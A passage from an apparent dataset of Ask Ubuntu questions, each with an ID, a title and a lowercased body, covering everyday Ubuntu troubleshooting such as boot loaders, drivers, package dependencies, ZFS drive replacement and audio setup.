installed . i searched the net for solutions and found suggestions to run the command sudo apt-get update and updated everything . however , the problem still persists . what can i do ? please help me .
348202	fullscreen graphics problem .	whenever i make a youtube video , minecraft , the sims 3 ( in wine ) , or i assume any other application into full-screen the desktop environment starts to flicker and go crazy . occasionally when i try to take a screen shot pressing the button actually stops the flickering , as well as turning up or down the volume . i found this to be quite curious . things still work but if you open an application it will flicker away and come back and things change according to where the mouse pointer is . the problem is solved when i log out and back in or if i restart . it is becoming a nuance because i make things full-screen without thinking . i am running 12.04 on a toshiba satellite l300 . i am upgrading soon but christmas is still a long way away ! from my experience because it has intel integrated graphics i do n't need to update like i would with nivida ? i am just an average joe user who is 16 so i have a smallish knowledge and grasp things easy but i am not that technical . so if you could explain things to that level it would help a lot : ) thank you in advance , sorry about my spelling .
348204	dpkg : dependency problems prevent configuration	i 'm trying to install armory on ubuntu 12.04 but it is not working : $ sudo dpkg -i armory_0.88.1-beta_i386.deb selecting previously unselected package armory : i386 . ( reading database ... 222699 files and directories currently installed . ) unpacking armory : i386 ( from armory_0.88.1-beta_i386.deb ) ... dpkg : dependency problems prevent configuration of armory : i386 : armory : i386 depends on python-qt4 . armory : i386 depends on python-twisted . armory : i386 depends on python-psutil . dpkg : error processing armory : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : armory : i386 it looked like i needed to install packages python-qt4 , python-twisted and python-psutil so i did this : $ sudo apt-get install python-qt4 python-twisted python-psutil reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : armory : i386 : depends : python-qt4 : i386 but it is not going to be installed depends : python-twisted : i386 but it is not installable depends : python-psutil : i386 but it is not going to be installed python-qt4 : depends : libqtassistantclient4 ( > = 4.6.3 ) but it is not going to be installed depends : sip-api-8.1 python-twisted : depends : python-twisted-conch ( > = 1:11.0 ) but it is not going to be installed depends : python-twisted-mail ( > = 11.0 ) but it is not going to be installed depends : python-twisted-lore ( > = 11.0 ) but it is not going to be installed depends : python-twisted-news ( > = 11.0 ) but it is not going to be installed depends : python-twisted-runner ( > = 11.0 ) but it is not going to be installed depends : python-twisted-words ( > = 11.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . for some reason they did not want to install so i did this : ( was this a bad move ? ) $ sudo apt-get -f install and after a massive amount of output in which it looked like many packages were removed ? ? ? nothing happened . armory still wo n't run and now i think i have screwed up some other valid packages since i have a lot of empty links with question marks on my unity bar . even the vim configuration file seems to have been altered ! help ! ( i should also mention that i recently upgraded from ubuntu 10.04 to 12.04 and that may not have gone too smoothly for bitcoind )
348206	empathy crashes when i open the acount manager	empathy is working with my google and facebook accounts , but every time i attempt to open the account manager it presents the account manager windows briefly and then closes it . the application continues to work after that , but i can not edit my account settings or add a new account to it .
348208	trying to flash ubuntu touch onto my nexus 4	using phablet-flash ubuntu-system -- no-backup to flash ubuntu-touch . it removes android and all , but gets to `` waiting for recovery image to boot '' and just shows a blank screen on the phone . tried this about 3 times now , and i 've waited a good ten minutes each time before giving up and reverting back to android.. any suggestions are appreciated !
348215	texlive-full , can i install it on 12.04. can i trust this source ?	i have a question regarding texlive-full . it is not in the ubuntu software center but can be installed through apt-get install texlive-full . are the codes of the program ckecked anyway ?
348218	failed to fetch cdrom : * warnings in apt , how to fix them ?	iâm a newbie with this ubuntu system , i often use windows.. anyway my uncle gave me a laptop which uses ubuntu 10 or something and i updated it to 12.04. the system popped out this ubuntu one and i clicked the install button yet several minutes some error came out as seen below . w : failed to fetch cdrom : //ubuntu 10.04.1 lts_lucid lynx_-release i386 ( 20100816.1 ) /dists/lucid/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 10.04.1 lts_lucid lynx_-release i386 ( 20100816 ) /dists/lucid/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . can someone help me with this ?
348222	wifi switch not working on hp pavilion dv4 using ubuntu 13.04	i have installed ubuntu 13.04 on my laptop alongside windows 8. the wifi switch does n't work . pressing it does n't do anything at all . any help regarding this ? this is what i get from rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hp-wifi : wireless lan soft blocked : no hard blocked : no 3 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no and this i get by sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 06 serial : 98:4b : e1 : ea : ba:03 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:47 ioport:3000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network description : wireless interface product : rt5390 [ 802.11 b/g/n 1t1r g-band pci express single chip ] vendor : ralink corp. physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : wlan0 version : 00 serial : 90:00:4e:82:25:3f width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-30-generic firmware=0.34 ip=10.9.4.55 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c2500000-c250ffff
348224	how to install libreoffice manually in lubuntu 13.04 ?	how to install libreoffice manually in lubuntu 13.04 ? i have downloaded a libreoffice_4.1.1_linux_x86-64_deb.tar.gz and when i extract i found 2 folders and 1 file , when i click install and new box appear there i click execute but nothing happen . please guide me how to install libreoffice using .gz downloaded file . thanks
348225	zpool 'replace ' vdev failed after resilvering - ca n't detach	my one zpool has experienced two successive drive failures . as i was resilvering the first , the second failed and i got two errors , in snapshots . the resilvering finished , and then i used `` zpool replace '' to resilver the second faulty drive . the pool is mounted , all data safe and available except for the two files : pool : gggpool state : degraded status : one or more devices has experienced an error resulting in data corruption . applications may be affected . scan : resilvered 2,35t in 19h29m with 5 errors on sat sep 21 03:08:24 2013 config : name state read write cksum gggpool degraded 0 0 5 raidz1-0 degraded 0 0 10 scsi-sata_st3000dm001-9yn_z1f0njks online 0 0 0 scsi-sata_st3000dm001-9yn_z1f0rpke online 0 0 0 scsi-sata_st3000dm001-9yn_z1f0rpzg online 0 0 0 scsi-sata_st3000dm001-9yn_z1f0rqj2 online 0 0 0 scsi-sata_st3000dm001-9yn_z1f0rqsv online 0 0 0 scsi-sata_st3000dm001-9yn_z1f0t6vn online 0 0 0 spare-6 degraded 0 0 0 scsi-sata_wdc_wd30ezrx-00_wd-wmc1t4095404 unavail 0 0 0 scsi-sata_st3000dm001-9yn_z1f118ba online 0 0 0 replacing-7 unavail 0 0 0 scsi-sata_st3000dm001-1ch_z1f2z9vc unavail 0 0 0 scsi-sata_st3000dm001-1ch_z1f2z8sm online 0 0 0 spares scsi-sata_st3000dm001-9yn_z1f118ba inuse currently in use the remaining errors probably point to where the faulty files were - i destroyed the relevant snapshots but these error indications remain : errors : permanent errors have been detected in the following files : < 0x218 > : < 0x7308 > < 0x3a0 > : < 0x295a6b > i am not worried about these errors . i am trying to detach the two failed drives , both of which has been replaced , but zpool does n't do it : root @ ggg : ~ # zpool detach gggpool scsi-sata_st3000dm001-1ch_z1f2z9vc can not detach scsi-sata_st3000dm001-1ch_z1f2z9vc : no valid replicas root @ ggg : ~ # zpool detach gggpool scsi-sata_wdc_wd30ezrx-00_wd-wmc1t4095404 can not detach scsi-sata_wdc_wd30ezrx-00_wd-wmc1t4095404 : no valid replicas the two drives have been physically removed from the array - sent in for warranty replacement - but they live on in the zpool configuration . how do i get rid of them ? when reading data from the pool , i can see the `` replacing-7 '' vdev is not active : capacity operations bandwidth pool alloc free read write read write -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- - -- -- - -- -- - -- -- - -- -- - -- -- - gggpool 19,8t 1,96t 323 0 36,8m 0 raidz1 19,8t 1,96t 323 0 36,8m 0 scsi-sata_st3000dm001-9yn_z1f0njks - - 177 0 5,42m 0 scsi-sata_st3000dm001-9yn_z1f0rpke - - 184 0 5,26m 0 scsi-sata_st3000dm001-9yn_z1f0rpzg - - 183 0 5,55m 0 scsi-sata_st3000dm001-9yn_z1f0rqj2 - - 183 0 5,25m 0 scsi-sata_st3000dm001-9yn_z1f0rqsv - - 180 0 5,39m 0 scsi-sata_st3000dm001-9yn_z1f0t6vn - - 181 0 5,21m 0 spare - - 298 0 5,47m 0 scsi-sata_wdc_wd30ezrx-00_wd-wmc1t4095404 - - 0 0 0 0 scsi-sata_st3000dm001-9yn_z1f118ba - - 230 0 5,49m 0 replacing - - 0 0 0 0 scsi-sata_st3000dm001-1ch_z1f2z9vc - - 0 0 0 0 scsi-sata_st3000dm001-1ch_z1f2z8sm - - 0 0 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- - -- -- - -- -- - -- -- - -- -- - -- -- - this is worrying because without this vdev working , the pool has no redundancy - yet i can not remove or detach any of its two drives . i am in the process of making a full backup - only a day to go . however , destroying this pool and rebuilding it will cause a lot of headaches , with many filesystems and smb and afs shared having to be re-set up . and ideas how i can force this failed replacing-7 vdev to work again ?
348226	problem with mute button on hp pavilion dv4 using ubuntu 13.04	i have installed ubuntu 13.04 on my laptop alongside windows 8. the mute button works but it shows as muted when sound is on and as on when it is muted . ( there is a led that tells about it ) any help regarding this ? i understand that some logs would be needed . i have no idea what logs will be needed and how to generate them .
348227	preparation of ubuntu 12.04 oem disk with full disk encryption support	i have prepared oem disk from alternative cd with full disk encryption . when i use that oem cd , it is not prompting for full disk encryption . is there any way to achieve this ?
348228	unknown encoder 'libvo_aacenc '	i get this error when i try to convert an wmv to 3gp using this command : ffmpeg -y -i `` inputvid.wmv '' -vf scale=352:288 -f 3gp -vcodec h263 -r 15 -b 200k -acodec libvo_aacenc -ac 2 -ar 32000 -ab 64k `` outputvid.3gp '' ( the command is actually derived from mobile media converter 1.8.2 which recently fails on each conversion and i 'm trying to troubleshoot . ) i have made the latest stable ffmpeg ( ffmpeg version 0.10.8-7:0.10.8-1~raring1 ) using these instruction . i appreciate your hints to either install libvo_aacenc , or some other codec to make conversion possible .
348229	ca n't authenticate in software center ? ! ? ! please help	here is the sequence of events : i just installed ubuntu 13.04 using a pendrive i set up a password that was very easy to remember . i then set up ubuntu one , but never got the email . i then set up a single sign on ( sso ) and password . i tried installing steam from the ubuntu software center . the user password did not work the sso password did not work i tried reinstalling ubuntu , regardless of bio settings i could not reinstal from reboot . basically i 'm stuck . i know my password but it 's not working . how can i fix this ? thanks for the help ! i really want to learn ubuntu !
348236	how do i fix my audio settings ?	i am running ubuntu 13.04 and downloaded the kxstudio repositories in order to install some audio plugins for ardour 3.4 . however , after i installed the kxstudio desktop by error there has n't been any sound coming out of my speakers , the mute button in the audio menu is gone and there are no sound cards to `` play sound through '' under audio settings . right now there is nothing on the sound-front that is actually working . what can i do about this ? also why do i need to select `` ubuntu '' from a menu every time i boot my system ? the other options are memorytest-something1 and memorytest-something2 lastly i 've had some trouble with jack ... before the kxstudio incident it worked fine when running ardour , but when i quit it still seemed to be using the sound card so i could n't use youtube or any other soundrelated software ( except ardour of course ) .
348237	integration opera and transmission with unity	how to integrate opera and transmission with unity ? i try this : http : //askubuntu.com/a/41228 https : //github.com/kriomant/transmission-unity-launcher but is n't work . i mean integration like number new mails , download progress bar .
348238	can not access a website from ubuntu desktop , while the website is live	i has a website hosted on centos vps . that website has a self signed certificate . now , i migrated that site to another host . i generated keys for using sftp and ssh in old hosting . the problem is that now i am unable to access the site from ubuntu . whereas it is accessible from other computers . i tried various browsers ( firefox , google-chrome , chromium ) but i cant open the site . deleting the cache also did n't change things . any clue ? this is what happens in chromium : update : i ran ssh-keygen -r hostname that did n't help . finally i deleted known_hosts file as well , still not working . uninstalling and re-installing the browser did n't solve the issue . logging out as guest user also did n't open the page .
348239	how can i install mongodb on a different drive ?	i have a ubuntu 13.04 computer with two hard drives ; one is 30gb , the other is 500gb . i use the 30gb drive for the os and i install everythign else on the 500gb drive . how can i install mongodb on to that drive ? if i just install using apt-get , by default it will install to my os drive . is there a way to change it ?
348241	suppress output for a2ensite and a2dissite commands	i 've been trying to find a way to suppress the output for the a2ensite and a2dissite commands . man pages do n't seem to provide for any sort of `` silent '' or `` quiet '' mode . here 's what i see with a2ensite : enabling site ... enabling site hello . to activate the new configuration , you need to run : service apache2 reload and with a2dissite : removing dangling symlink /etc/apache2/sites-enabled/mysite is there any way to prevent any output at all ?
348242	query timezone tzdata when dst happens ?	i have forgot and could not found the command . please provide the command that queries from tzdata that when dst will occur in current timezone according to server tzdata package and it returns for example something like dst will occur at 2013/09/21 23:59:59 -1h
348243	can not boot into ubuntu 12.04 after adding an additional hard drive	i 've installed both ubuntu and windows7 on my laptop , i 've replaced my internal hard drive with ssd , and it worked well ( both ubuntu and win7 ) . however the space is just not enough so i put my hard drive back with an adaptor ( i 'm not sure how it 's called , it 's a case that replaces original cd-rom and can place my hard drive inside ) , and it just does n't work any more . devices laptop with only one hard drive slot a 120gb ssd installed at the internal slot ( windows /dev/sda3 , ubuntu /dev/sda6 ) a 500gb traditional hard drive at cd-rom slot ( with an adaptor ) situation at first i tried to use windows bootloader ( which i used to when no second hard drive ) , and the windows part worked fine , but when i select the ubuntu entry i get stuck and it shows try ( hd0,0 ) : ntfs5 : no ang0 try ( hd0,1 ) : ntfs5 : no ang0 try ( hd0,2 ) : extended try ( hd0,3 ) : invalid or null try ( hd0,4 ) : ntfs5 : no ang0 try ( hd0,5 ) : extended try ( hd0,5 ) : ntfs5 : no ang0 try ( hd0,6 ) : extended try ( hd0,6 ) : ext2 : then i tried install grub to mbr and use grub as default , with no second harddrive it loads grub first and both windows and ubuntu worked well , but if i install the second harddrive it just load back to the original windows bootloader ( i just ca n't figure it out why ? ) , and the situation is same as above . i 'm quite sure it 's loading the bootloader from ssd not the other drive bcuz there 's a jumper on the second hdd and if i switch it then it loads the second hdd 's mbr ( which has four entries ) question how can i boot into both system without reinstalling any of them ? i 'm sure both systems are not corrupted since i can boot into both whenever i remove the second hdd first time ask , pls help ... ... thx ! ! i 've searched for many articles but most people install different os on different hard drive ... ..
348247	samsung laptop brightness issue ? can , t change brightness on my laptop	i have installed windows 7 on my samsung laptop , but there is no effect of brightness when i press fn keys , brightness remains same.what can i do ? i m very worried ! please help me .
348254	how to include a xubuntu 13.04 in desktop environment , in wubi	how to include a xubuntu 13.04 in desktop environment , in wubi i have downloaded xubuntu but there seemed to be no wubi i also downladed other version ( 13.04 = > ubuntu , lubuntu ) that include a wubi and when i install using wubi it works prefect . i simply extract xubuntu 13.04 image and copied wubi from ubuntu iso package , but when i open there is no xubuntu option in desktop environment .
348256	ubuntu startup boot screen goes wonky	i have ubuntu 12.04 installed and my startup boot screen ( the purple on with the ubuntu logo and 5 dots beneath it ) shows for sometime and then goes totally wonky ( something like depixelated ) . then the login screen shows and everything is all well . any idea how i can fix this screen ? i 'm guessing it has something to do with my graphics drivers ? i have an ati card .
348258	want [ ubuntu ] iso bootable on external hdd as livecd	-- -getting to the point : -would like to take iso file of ubuntu and put it on my hdd and make it bootable . not copy from cd . or use usb . -strictly take iso , manipulate it onto hdd as live bootable image , not only to run it , but install it if need be . -i know there are a few post on using a cd as reference for making hdd bootable . but i would like to use the iso i have . ( also prior posts i looked at get scrambled and go no where ) -full instructions would be cool , including where to get and how to install the grub loader . i know it 's needed to make the hdd recognizable for booting purposes . { if there is a link to a prior post , post it . then delete this one . } -also i know the size of the partition i need to make and the swap partion next to it i need to make . i appreciate the expertise in advance . ( i 'm using win7 to create all this , but want to boot hdd on xp , vista - systems ect )
348262	turn airplane mode on/off via terminal	what is the terminal command to turn airplane mode on/off in ubuntu ? is it simply sudo rfkill block all and sudo rfkill unblock all ? i know that this will disable all wireless modules in the computer , but will this be noticed by the system , so that airplane mode is toggled off/on in network settings ?
348264	how to enable beats audio for hp 7040tx for the intel corporation 7 series/c210 series chipset	i have installed 12.04.3 in my hp dv6 7040tx . it has quad speakers + one sub woofer ( beats audio ) . i went through many posts and i was not able to find the solution . i tried the package hda-jack-retask but , i can hear only much of bass like voice and music . here are the configuration when i run lspci | grep `` audio '' 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) when i run cat /proc/asound/card0/codec # * |grep codec codec : idt 92hd91bxx codec : intel pantherpoint hdmi when i run aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 when i run lspci -v | grep -a 8 -i audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : hewlett-packard company device 1818 flags : bus master , fast devsel , latency 0 , irq 47 memory at d4610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) can i get a solution to make use of my beats audio in ubuntu . thank you for trying to help me
348267	.x86 file not executing	i 've tracked down a game named superhot and downloaded zipped linux version . i unzipped it and there was a directory named superhot-linux_data and file with extension .x86 . i went to properties and ticked `` can execute '' . but the file still does n't start . all i can see is bunch of processes starting upon clicking on that file . their names starts with unity . should i install some libraries or something ? thanks for advice edit : i 've tried as damien said and mono installed successfully , but still nothing . then i tried running that file from terminal : $ ./superhot-linux.x86 and it returned : ./superhot-linux.x86 : error while loading shared libraries : libglu.so.1 : can not open shared object file : no such file or directory i guess something is missing ?
348269	after update ubuntu 12.04 does no longer boot on a uefi machine	i got a computer running ubuntu 12.04 64bit with uefi . today ( 2013-09-21 ) i installed all updates that were available without carefully reading through the list ( shame on me ) , since noone touched the computer for some weeks and the list was more than 100 items long ... i remember from another machine , that one of the updates changes the boot system on uefi machines in order to always use shim , even if restricted boot is disabled . well , problem diagnosis is rather straightforward : something went wrong with the bootloader update , although no error was given , and the ubuntu entry went missing from the uefi boot menu , making the computer try to boot in bios mode , of course failing . if i run efibootmgr from a bootable usb it only shows the bios boot mode for the hdd ... how do i restore the ubuntu entry in the uefi menu to make the machine bootable again ?
348271	can someone help me find installer driver for canon mg3200 for ubuntu/linux ?	can someone help me find installer/driver for canon mg3200 for 13.04 ubuntu/linux ? canon has only windows driver available online . thanks
348272	how can i bring my gmail contacts including birthdays into thunderbird	i tried to import into thunderbird the contacts.vcf as exported from gmail , but birthdays did n't make it into thunderbird 's address book , although vcard 's field bday : yyyymmdd is present . could someone please post a working example ? a workaround is to sync contacts using a thunderbird add-on as answered in how to import google contacts into ubuntu 13.04 ? another offline ( offline is desired in this question ) workaround could be to convert google 's vcard export into thunderbird 's import format ldif . as opposed to vcard the birthday in ldif is not one field but three ( birthyear , birthmonth , birthday ) .
348273	how can i change the behavior of enter key in pidgin ?	i want to use enter as a new line key and send messages using ctrl+enter . how can i rebind the behavior of the keys ?
348275	how do i make these files bootable from a cd/usb drive ?	i had copied the entire working bootable ubuntu 10.4 64bit cd to my hard drive ( its not an image or an iso file , just selected the entire disc and dragged and dropped into my desktop ) that cd is now damaged and unusable and i do n't have an extra copy.. downloading an entire 700 mb ubuntu iso package again is not really an option for me so please do n't suggest that ! the question is , i have all the required file components which i copied in my hard drive , how do i make these bootable from a cd or a usb drive ? i am not familiar with any non-gui cmd methods so please explain step by step in the easiest way ! ps : i have tried converting these files into a single .iso file with nero burning rom and tried burning the image.iso into a cd and usb flash , configured the bios boot device to usb-fdd , enabled the usb legacy option and restarted my pc with the usb.. still it does'nt ask for boot at startup ! i am on windows7ultimate..
348277	removed efi on macbook during ubunutu installation . how to access grub ?	i removed the efi menu on my macbook during my ubunutu installation . i 'm trying to install refind on my macbook , but i ca n't seem to access the bootable disk . if i hold alt during the boot , there are no options to select from .
348278	sound problem on asus n750jv	asus n750 has an external subwoofer , but it does n't work on ubuntu . i tried to solve the problem as it was written in http : //askubuntu.com/questions/189304/no-sound-from-external-subwoofer-sonic-master-on-an-asus-n76vm , but it does n't work . in extra-hdmi.conf i added [ general ] auto-profiles = no [ mapping analog-surround-21 ] device-strings = surround40 : % f channel-map = front-left , front-right , lfe , lfe paths-output = analog-output analog-output-speaker priority = 7 direction = output and reboot , the only sound device is `` dummy input '' . can you help me to solve this problem ? lspci -k | grep -i -a2 `` multimedia\|audio '' output : 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : intel corporation device 2010 kernel driver in use : snd_hda_intel -- 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) subsystem : asustek computer inc. device 129d kernel driver in use : snd_hda_intel
348281	can not set native resolution	i almost month ago installed ubuntu 13.04 . it worked fine with 1366x768 resolution . but i changed it to 1280x1024 today and after that i can not set to 1368x768 . monitor shuts down . how can i set it back to original resolution ?
348282	effective user id not changing when setting uid to root	i 'm currently reading a book on programming with c , i got to a part where i got to write a program which will display the real uid and effective uid that the file is being executed on . after compiling the code with gcc , i input the command to see the current uowner and gowner ls- l id_demo the output is this -rwxrwxr-x 1 user user 8629 sep 21 13:04 id_demo i then execute the program it 's self this is what i get : real uid : 1000 effective uid : 1000 ... so far so good . i then input a command to change the owner of the file sudo chown root : root ./id_demo the ls -l confirms that the owner has been changed to root ; -rwxrwxr-x 1 root root 8629 sep 21 13:04 id_demo again , executing the program shows real uid and uid as 1000 . the last step after which the uid must be 0 is this : sudo chmod u+s ./uid_demo but for me they stay as 1000 , where in the book the output is clearly show to be this : real uid : 1000 effective uid : 0 any ideas why is this happening ? update id_demo source code : # include < stdio.h > int main ( ) { printf ( `` real uid : % d\n '' , getuid ( ) ) ; printf ( `` effective uid : % d\n '' , geteuid ( ) ) ; } update 2 screen shots
348285	replacing ubuntu ( 13.04 ) with windows 8	i have used winusb to make a bootable usb ( imatation apollo ux - 250gb ) , but when i go to bios and set it to boot from the usb it only gives a black screen . i have windows 8 on it and i want to replace ubuntu with windows . is this possible ? please help
348286	trying to do dual boot install : the test of the file system with type ext4 in partition # 1 of scsi2 ( 0 , 0 , 0 ) found uncorrected errors	my ubuntu computer crashed recently , and i did recover the important things and put them on a usb drive , but i 'd still rather not wipe everything off my computer , so i thought i 'd do a dual installation and have ubuntu running alongside the crashed ubuntu . when i put in the live cd and tried doing a dual boot install i got this error the test of the file system with type ext4 in partition # 1 of scsi2 ( 0 , 0 , 0 ) found uncorrected errors if you do not go back to the partitioning menu and correct these errors , the partition will be used as is my options are go back and continue , so i press continue and get this error . an error occurred while writing the changes to the storage devices . the resize operation has been aborted . i also noticed a screen covered in orange and writing once not long after i had inserted the live cd and before i tried doing dual boot installation . i took a picture of it but i 'm having trouble uploading it . these are some of the things it said status : { drdy err } da , sector 151452203931051 buffer i/o error on device sda1 , logical block 1891273 i think i 'll try uploading the picture on another computer because it says a lot of stuff and i ca n't type it all ... is my hard drive ruined ?
348287	reconnect usb modem every 12 hours	i 'm planning on having a 4g lte usb modem plugged into a server computer at home . i will then go somewhere else . i 'm afraid it will disconnect , and if it does not work i would have to go home to fix it . is there a possibility to automatically remount / reconnect usb 4g modem with a command every 12 hours ? it 's a zte mf821d modem , which means , it will connect to internet just by plug out and in .
348288	microsoft wireless mouse 5000 lag ubuntu 12.04	i have had ubuntu 12.04 for about a month , and also since then i 'm having issues with my mouse ( microsoft wireless mouse 5000 ) . after about 30 min -1 hour the cursor starts to lag which is very annoying . the batteries are full , and other usb devices do not display any issues . are there any drivers i should have installed ( i only plugged in the receiver ) ? edit : the mouse is communicating with a 2,4ghz mcirosoft wireless transceiver v7.0 .
348290	how to get epson perfection v10 run on ubuntu ?	tried already many different routes , installing the drivers which are now at epson.com - installed sane libs etc. , but no way to get the scanner recognized . anybody ran into this by chance ? would be cool , if somebody could give me guidance here
348292	is any svn can link to samba user ?	i am using ubantu machine to share the files to mac , window and linux machine by using samba share . each users have their own user account to access samba folder but folders are common . so like to to implement a svn that help me to get which samba user edited or deleted the file of each project .
348294	ivy bridge or haswell for ubuntu server ?	i 'm thinking of building a linux server with either ivy bridge ( 3770k ) or haswell ( 4770k ) and run it under ubuntu 12.04 lts 64bit . but considering kernel support for each type of cpus , which one should i get ? any up-to-date comparison other than http : //www.phoronix.com/scan.php ? page=article & item=intel_4770k_linux & num=1 which is a bit old ?
348299	what is arios-automount startup command ?	i accidentally removed arios-automount startup , so drives do n't startup with the system any more , even with reinstalling the program , and i do n't know the startup command for it . any help ?
348301	how to change and save mouse settings ?	my cursor got all jumpy lately and i want to lower touchpad sensitivity , how can i do it ? mouse & touchpad menu allows me to make changes but does n't save them after i close its window . and there 's no discernible change . also , where is the option to disable mouse/touchpad acceleration . do i need to edit xorg.conf and reboot like it 's 2002 ? i 'm on a regular ubuntu 13.04 with unity .
348308	find graphics card/driver details	i have installed ubuntu 13.04 . how can i check that i have a driver for my graphics card installed and see details about it ?
348309	rename file from title - author to author - title	my files are of the form war of the world - h. g. wells.pdf i would like wells h g - war of the worlds.pdf there are several other file extensions epub , mobi etc . is there a package that will do this - in bulk ? any help greatly appreciated . thanks i should add that i have pyrenamer already . most files are of the format title - author.ext eg harry potter blah de blah - j.k.rowling.pdf or some other title - firstname surname.epub what i would like is surname firstname - title.ext ( os is ubuntu 12.04lts ) tia
348311	change folder & file permissions for all subdirectories	i created some files as root that i would now like to be changed to a specific user . how would i do this ? i can not go trough the files one by one as that 'd just take way too much time . i would like to do this preferably trough nautilus . if there is an easier way to do it trough console though , i 'm all in .
348317	toshiba satellite l655 notebook overheated ubuntu 13.04-64 bit	i have a toshiba l655 with intel core i3 and ati mobility radeon 4500 series , 3gb ram . recently i have replaced my windows 8 with ubuntu 13.04 64bit . but after some days of use , i am having overheating problem . cooling fan is blowing super hot air . during windows times everything was ok.please give me a solution , i do n't wan na go back to windows . by the way , after ubuntu installation , i did n't install any kind of drivers .
348318	how can i tell if launchpad is up or down or is having any network issues ?	i 've not been able to update or add ppas for the last few hours . how can i tell what the status of launchpad.net is ?
348319	correct md5 sum but it is not installing	i have tried to burn my iso file of ubuntu 12.04 lts 4 times but none of them booted successfully or installed successfully then i tried to make a boot able usb flash drive but again it dose n't installed . now i am trying to install it online but it is downloading 64 bit version ( amd64.tar.xz ) but mine is 32 bit . is it possible that md5 sum is correct but iso file is corrupt . the setup when started on windows says something like 'unable extract file see log file ' . my pc is a p4 32-bit , 1 gb ram , 16 mb video card and no graphics card . if anyone suggest any other version of ubuntu as my pc is 8 years old .
348321	can i have a ubuntu 12.04 live usb work with both the -persistance and -toram additional boot options ?	i really like using the ubuntu 12.04 live cd/usb 's `` -toram '' additional boot option for my laptop because `` -toram '' adds a few extra hours to the battery and makes things a little faster . i add the additional boot options by pressing `` f6 '' as the live cd begins to start . the only problem with the copy live cd to ram option is that when i have to turn off my computer , i lose the programs i downloaded while in ram only mode . to solve that problem , can i effectively add `` -persistance '' ( persistent live usb storage ) to `` -toram '' ? i want ubuntu 12.04 to copy the files saved to ram into the usb for persistent storage when i click `` shut down '' . then when i boot from usb , i want it to copy all the files ( including those saved from the last session ) back into ram .
348328	cursor teleporting , problems pointing , scroll erratic -- how do i know if it 's a hardware or software problem ?	my cursor has become really unwieldy . i have trouble with precise movements , or even just clicking the right word . scroll ( i use the traditional edge scroll ) seems completely random at times , or i 'm not able to scroll up past a certain point , as if it was bouncing off some ceiling . i tried playing with the touchpad sensitivity settings via the touchpad & mouse menu , xinput , and gpointing device settings but i can only make it marginally better . so what should i do and how do i figure out if it 's some broken software update or maybe a physical/hardware problem ? it was all fine a ~week ago .
348331	which filters should i change in zynaddsubfx to help reduce white noise ?	i think i have narrowed down my white noise issue . it 's a lot better , but it 's not completely gone yet . i think the issue is my pedal on my midi keyboard . i did an experiment with and without and discovered this . this is what the filter window looks like : i just do n't know enough about filters to really use them . can anyone give me an idea of which filters to alter ? thank you all in advance .
348334	gnome3 - ca n't change top panel black color	no matter the shell theme i select in tweak-tool , the top panel is always black . only with certain themes the font changes . i have installed themes that are supposed to have a transparent panel ( like zukitwo and nord ) , but nothing changes the black panel .
348335	no such partition / grub error	i had ubuntu 13.04 installed ( dual boot with windows 8 ) and wanted to downgrade to 12.04 . i rebooted from cd and installed ubuntu 12.04 . i could n't install grub normally on 12.04 , so i deleted the partition 's content on windows 8 . when i rebooted my computer , grub rescue presented me with an error : no such partition.any commands i try to put in seem to be unknown . how do i get back into my windows 8 installation or my boot menu ?
